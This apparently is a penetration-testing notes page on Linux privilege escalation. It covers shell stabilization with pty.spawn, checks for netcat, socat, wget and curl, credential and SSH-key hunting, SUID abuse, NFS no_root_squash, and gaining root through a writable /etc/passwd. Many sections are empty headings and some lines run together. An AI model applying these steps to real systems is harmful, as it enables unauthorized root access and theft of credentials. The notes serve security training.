Privilege Escalation
Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.
Step 1: Upgrade Your Shell
Make your shell more stable & interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200Step 2: Enumeration – System Context
Capabilities & Tooling
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socatCompilation / System Info
Arch & Kernel
Step 3: User Context
Are we a real user?
Users & homes:
Step 4: Credentials & Configs
Check for web creds:
Check /etc/ for unusual configs:
SSH keys:
Other dirs of interest:
Step 5: Escalation Primitives
SUID / GUID
Check exploitation paths: GTFOBins
File Capabilities
Reference: Linux File Capabilities
Step 6: Process & Cron Monitoring
Running Processes
Network
Cron Jobs
Process Monitoring (pspy)
Step 7: Databases
Check for MySQL root creds:
Step 8: File Transfers
Check what’s available:
Step 9: NFS
Check for exports:
👉 Look for no_root_squash → Attacking NFS Shares
Step 10: Persistence / Living on Host
Writable locations:
/var/tmp//tmp//dev/shm/
Check mounts:
Step 11: Local Port Forwards
If vulnerable services are only on 127.0.0.1:
Use
meterpreterport forwarding.
Step 12: Direct Root via /etc/passwd
/etc/passwdIf writable:
Step 13: Miscellaneous
Mail:
Files by specific user (ex: bob):
Tools
Last updated